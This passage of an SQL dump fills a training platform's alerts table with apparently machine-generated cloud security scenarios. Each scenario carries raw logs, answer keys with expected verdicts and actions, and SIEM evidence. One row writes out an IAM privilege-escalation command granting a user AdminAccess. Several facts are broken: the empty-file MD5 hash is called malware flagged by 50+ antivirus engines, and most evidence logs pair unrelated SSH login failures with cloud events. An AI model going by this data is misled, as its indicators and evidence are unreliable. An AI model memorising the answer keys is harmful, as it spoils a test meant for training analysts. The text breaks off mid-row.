100\"}}', 0),
(756, 'Unauthorized IAM Privilege Escalation Attempt', 'critical', 'AWS CloudTrail', 'An IAM user attempted to escalate privileges without authorization, indicating potential account compromise.', 'Credential Attack', 'T1078', 1, 'Closed', 165, '{\"timestamp\":\"2026-01-11T10:20:00Z\",\"event_type\":\"iam_policy_change\",\"src_ip\":\"203.0.113.77\",\"dst_ip\":\"\",\"username\":\"compromised_user\",\"hostname\":\"iam.amazonaws.com\",\"request_body\":\"\",\"command_line\":\"aws iam put-user-policy --user-name compromised_user --policy-name AdminAccess --policy-document file://admin_policy.json\",\"policy_name\":\"AdminAccess\"}', '2026-01-11 09:24:16', '2026-02-16 17:46:11', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.77\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 560 times for unauthorized access attempts\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"internal\",\"details\":\"IAM user account detected with unauthorized privilege escalation attempt\"}}],\"expected_actions\":[\"reset_credentials\",\"block_ip\",\"audit_user_activity\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The command to escalate IAM privileges combined with the source IP\'s reputation indicates a compromise attempt.\"}', 'Beginner', 'CLOUD', 3, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.404Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T10:20:00Z\\\",\\\"event_type\\\":\\\"iam_policy_change\\\",\\\"src_ip\\\":\\\"203.0.113.77\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"hostname\\\":\\\"iam.amazonaws.com\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"aws iam put-user-policy --user-name compromised_user --policy-name AdminAccess --policy-document file://admin_policy.json\\\",\\\"policy_name\\\":\\\"AdminAccess\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.404Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T10:20:00Z\\\",\\\"event_type\\\":\\\"iam_policy_change\\\",\\\"src_ip\\\":\\\"203.0.113.77\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"hostname\\\":\\\"iam.amazonaws.com\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"aws iam put-user-policy --user-name compromised_user --policy-name AdminAccess --policy-document file://admin_policy.json\\\",\\\"policy_name\\\":\\\"AdminAccess\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.404Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T10:20:00Z\\\",\\\"event_type\\\":\\\"iam_policy_change\\\",\\\"src_ip\\\":\\\"203.0.113.77\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"hostname\\\":\\\"iam.amazonaws.com\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"aws iam put-user-policy --user-name compromised_user --policy-name AdminAccess --policy-document file://admin_policy.json\\\",\\\"policy_name\\\":\\\"AdminAccess\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.404Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T10:20:00Z\\\",\\\"event_type\\\":\\\"iam_policy_change\\\",\\\"src_ip\\\":\\\"203.0.113.77\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"hostname\\\":\\\"iam.amazonaws.com\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"aws iam put-user-policy --user-name compromised_user --policy-name AdminAccess --policy-document file://admin_policy.json\\\",\\\"policy_name\\\":\\\"AdminAccess\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.404Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T10:20:00Z\\\",\\\"event_type\\\":\\\"iam_policy_change\\\",\\\"src_ip\\\":\\\"203.0.113.77\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"hostname\\\":\\\"iam.amazonaws.com\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"aws iam put-user-policy --user-name compromised_user --policy-name AdminAccess --policy-document file://admin_policy.json\\\",\\\"policy_name\\\":\\\"AdminAccess\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(757, 'Suspicious Lambda Function Execution', 'medium', 'AWS Security Hub', 'A Lambda function executed with unexpected parameters, indicating potential misuse for crypto mining activities.', 'Resource Hijacking', 'T1059', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-11T11:00:00Z\",\"event_type\":\"lambda_execution\",\"src_ip\":\"192.0.2.44\",\"dst_ip\":\"\",\"username\":\"lambda_user\",\"hostname\":\"lambda.amazonaws.com\",\"request_body\":\"function: crypto_mine\",\"command_line\":\"\"}', '2026-01-10 07:51:32', '2026-02-22 15:13:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.0.2.44\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP previously associated with crypto mining pools\"}},{\"id\":\"artifact_2\",\"type\":\"request_body\",\"value\":\"function: crypto_mine\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"Unexpected function parameter for crypto mining detected\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"disable_function\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"resource_hijacking\",\"analysis_notes\":\"The execution of a Lambda function for crypto mining suggests resource hijacking, especially given the IP’s history.\"}', 'Beginner', 'EDR', 3, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.405Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T11:00:00Z\\\",\\\"event_type\\\":\\\"lambda_execution\\\",\\\"src_ip\\\":\\\"192.0.2.44\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"lambda_user\\\",\\\"hostname\\\":\\\"lambda.amazonaws.com\\\",\\\"request_body\\\":\\\"function: crypto_mine\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.405Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T11:00:00Z\\\",\\\"event_type\\\":\\\"lambda_execution\\\",\\\"src_ip\\\":\\\"192.0.2.44\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"lambda_user\\\",\\\"hostname\\\":\\\"lambda.amazonaws.com\\\",\\\"request_body\\\":\\\"function: crypto_mine\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.405Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T11:00:00Z\\\",\\\"event_type\\\":\\\"lambda_execution\\\",\\\"src_ip\\\":\\\"192.0.2.44\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"lambda_user\\\",\\\"hostname\\\":\\\"lambda.amazonaws.com\\\",\\\"request_body\\\":\\\"function: crypto_mine\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.405Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T11:00:00Z\\\",\\\"event_type\\\":\\\"lambda_execution\\\",\\\"src_ip\\\":\\\"192.0.2.44\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"lambda_user\\\",\\\"hostname\\\":\\\"lambda.amazonaws.com\\\",\\\"request_body\\\":\\\"function: crypto_mine\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.405Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T11:00:00Z\\\",\\\"event_type\\\":\\\"lambda_execution\\\",\\\"src_ip\\\":\\\"192.0.2.44\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"lambda_user\\\",\\\"hostname\\\":\\\"lambda.amazonaws.com\\\",\\\"request_body\\\":\\\"function: crypto_mine\\\",\\\"command_line\\\":\\\"\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(758, 'False Positive: Unusual Login Attempt from Known Safe VPN', 'low', 'Azure Sentinel', 'A login attempt from a foreign IP was flagged as suspicious, but investigation reveals it is a known safe VPN used by the employee.', 'Credential Attack', 'T1078', 0, 'closed', NULL, '{\"timestamp\":\"2026-01-11T12:30:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.99\",\"dst_ip\":\"\",\"username\":\"employee_vpn_user\",\"hostname\":\"login.microsoftonline.com\",\"request_body\":\"\",\"command_line\":\"\",\"failed_attempts\":3}', '2026-01-10 04:12:19', '2026-02-22 14:50:13', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.99\",\"is_critical\":false,\"osint_result\":{\"source\":\"IPQualityScore\",\"verdict\":\"clean\",\"details\":\"IP belongs to a known safe VPN provider used by the employee\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"employee_vpn_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"internal\",\"details\":\"User account verified to use this VPN regularly\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The IP is associated with a legitimate VPN used by the employee, explaining the foreign login attempt.\"}', 'Beginner', 'SIEM', 3, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.406Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T12:30:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.99\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"employee_vpn_user\\\",\\\"hostname\\\":\\\"login.microsoftonline.com\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\",\\\"failed_attempts\\\":3}\"},{\"timestamp\":\"2026-02-01T20:31:22.406Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T12:30:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.99\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"employee_vpn_user\\\",\\\"hostname\\\":\\\"login.microsoftonline.com\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\",\\\"failed_attempts\\\":3}\"},{\"timestamp\":\"2026-02-01T20:30:22.406Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T12:30:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.99\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"employee_vpn_user\\\",\\\"hostname\\\":\\\"login.microsoftonline.com\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\",\\\"failed_attempts\\\":3}\"},{\"timestamp\":\"2026-02-01T20:29:22.406Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T12:30:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.99\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"employee_vpn_user\\\",\\\"hostname\\\":\\\"login.microsoftonline.com\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\",\\\"failed_attempts\\\":3}\"},{\"timestamp\":\"2026-02-01T20:28:22.406Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T12:30:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.99\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"employee_vpn_user\\\",\\\"hostname\\\":\\\"login.microsoftonline.com\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\",\\\"failed_attempts\\\":3}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(759, 'AWS S3 Bucket Exposed to Public', 'high', 'AWS GuardDuty', 'An AWS S3 bucket has been detected with public read permissions enabled, potentially exposing sensitive data.', 'Data Exposure', 'T1530', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-11T08:45:00Z\",\"event_type\":\"configuration_change\",\"src_ip\":\"192.168.1.5\",\"dst_ip\":\"N/A\",\"username\":\"admin@example.com\",\"hostname\":\"aws-s3-bucket\",\"request_body\":\"PUT /public-access-block\",\"command_line\":\"N/A\"}', '2026-01-09 23:33:08', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"username\",\"value\":\"admin@example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"internal\",\"details\":\"Administrative user account for AWS management\"}},{\"id\":\"artifact_2\",\"type\":\"payload\",\"value\":\"PUT /public-access-block\",\"is_critical\":true,\"osint_result\":{\"source\":\"AWS Documentation\",\"verdict\":\"suspicious\",\"details\":\"Public access block configuration change detected\"}}],\"expected_actions\":[\"close_alert\",\"audit_configuration\",\"notify_admin\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The S3 bucket was configured with public access, posing a risk of data exposure.\"}', 'Novice', 'DLP', 1, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.407Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:45:00Z\\\",\\\"event_type\\\":\\\"configuration_change\\\",\\\"src_ip\\\":\\\"192.168.1.5\\\",\\\"dst_ip\\\":\\\"N/A\\\",\\\"username\\\":\\\"admin@example.com\\\",\\\"hostname\\\":\\\"aws-s3-bucket\\\",\\\"request_body\\\":\\\"PUT /public-access-block\\\",\\\"command_line\\\":\\\"N/A\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.407Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:45:00Z\\\",\\\"event_type\\\":\\\"configuration_change\\\",\\\"src_ip\\\":\\\"192.168.1.5\\\",\\\"dst_ip\\\":\\\"N/A\\\",\\\"username\\\":\\\"admin@example.com\\\",\\\"hostname\\\":\\\"aws-s3-bucket\\\",\\\"request_body\\\":\\\"PUT /public-access-block\\\",\\\"command_line\\\":\\\"N/A\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.407Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:45:00Z\\\",\\\"event_type\\\":\\\"configuration_change\\\",\\\"src_ip\\\":\\\"192.168.1.5\\\",\\\"dst_ip\\\":\\\"N/A\\\",\\\"username\\\":\\\"admin@example.com\\\",\\\"hostname\\\":\\\"aws-s3-bucket\\\",\\\"request_body\\\":\\\"PUT /public-access-block\\\",\\\"command_line\\\":\\\"N/A\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.407Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:45:00Z\\\",\\\"event_type\\\":\\\"configuration_change\\\",\\\"src_ip\\\":\\\"192.168.1.5\\\",\\\"dst_ip\\\":\\\"N/A\\\",\\\"username\\\":\\\"admin@example.com\\\",\\\"hostname\\\":\\\"aws-s3-bucket\\\",\\\"request_body\\\":\\\"PUT /public-access-block\\\",\\\"command_line\\\":\\\"N/A\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.407Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:45:00Z\\\",\\\"event_type\\\":\\\"configuration_change\\\",\\\"src_ip\\\":\\\"192.168.1.5\\\",\\\"dst_ip\\\":\\\"N/A\\\",\\\"username\\\":\\\"admin@example.com\\\",\\\"hostname\\\":\\\"aws-s3-bucket\\\",\\\"request_body\\\":\\\"PUT /public-access-block\\\",\\\"command_line\\\":\\\"N/A\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(760, 'Multiple Failed Login Attempts Detected', 'medium', 'Splunk', 'A foreign IP address has been detected making multiple failed login attempts to the AWS console.', 'Credential Attack', 'T1110', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-11T09:30:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"N/A\",\"username\":\"j.doe@example.com\",\"hostname\":\"aws-console\",\"request_body\":\"N/A\",\"command_line\":\"N/A\"}', '2026-01-10 09:16:29', '2026-02-17 22:35:23', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"j.doe@example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"internal\",\"details\":\"User account for AWS console access\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The IP address is associated with known malicious activity and attempted unauthorized access.\"}', 'Novice', 'SIEM', 1, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.409Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T09:30:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"N/A\\\",\\\"username\\\":\\\"j.doe@example.com\\\",\\\"hostname\\\":\\\"aws-console\\\",\\\"request_body\\\":\\\"N/A\\\",\\\"command_line\\\":\\\"N/A\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.409Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T09:30:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"N/A\\\",\\\"username\\\":\\\"j.doe@example.com\\\",\\\"hostname\\\":\\\"aws-console\\\",\\\"request_body\\\":\\\"N/A\\\",\\\"command_line\\\":\\\"N/A\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.409Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T09:30:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"N/A\\\",\\\"username\\\":\\\"j.doe@example.com\\\",\\\"hostname\\\":\\\"aws-console\\\",\\\"request_body\\\":\\\"N/A\\\",\\\"command_line\\\":\\\"N/A\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.409Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T09:30:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"N/A\\\",\\\"username\\\":\\\"j.doe@example.com\\\",\\\"hostname\\\":\\\"aws-console\\\",\\\"request_body\\\":\\\"N/A\\\",\\\"command_line\\\":\\\"N/A\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.409Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T09:30:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"N/A\\\",\\\"username\\\":\\\"j.doe@example.com\\\",\\\"hostname\\\":\\\"aws-console\\\",\\\"request_body\\\":\\\"N/A\\\",\\\"command_line\\\":\\\"N/A\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(761, 'Malicious File Executed on Azure VM', 'critical', 'Microsoft Defender for Cloud', 'A known malicious file was executed on an Azure Virtual Machine, indicating a potential compromise.', 'Malware', 'T1059', 1, 'Closed', 95, '{\"timestamp\":\"2026-01-11T11:15:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.2.4\",\"dst_ip\":\"N/A\",\"username\":\"vm-user\",\"hostname\":\"azure-vm-01\",\"request_body\":\"N/A\",\"command_line\":\"C:\\\\malware\\\\badfile.exe\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}', '2026-01-09 15:49:24', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash detected by 50+ antivirus engines\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"C:\\\\malware\\\\badfile.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Known malicious executable\"}}],\"expected_actions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The file executed is a known malicious program, posing a threat to the system.\"}', 'Novice', 'EDR', 1, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.409Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T11:15:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.2.4\\\",\\\"dst_ip\\\":\\\"N/A\\\",\\\"username\\\":\\\"vm-user\\\",\\\"hostname\\\":\\\"azure-vm-01\\\",\\\"request_body\\\":\\\"N/A\\\",\\\"command_line\\\":\\\"C:\\\\\\\\malware\\\\\\\\badfile.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.409Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T11:15:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.2.4\\\",\\\"dst_ip\\\":\\\"N/A\\\",\\\"username\\\":\\\"vm-user\\\",\\\"hostname\\\":\\\"azure-vm-01\\\",\\\"request_body\\\":\\\"N/A\\\",\\\"command_line\\\":\\\"C:\\\\\\\\malware\\\\\\\\badfile.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.409Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T11:15:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.2.4\\\",\\\"dst_ip\\\":\\\"N/A\\\",\\\"username\\\":\\\"vm-user\\\",\\\"hostname\\\":\\\"azure-vm-01\\\",\\\"request_body\\\":\\\"N/A\\\",\\\"command_line\\\":\\\"C:\\\\\\\\malware\\\\\\\\badfile.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.409Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 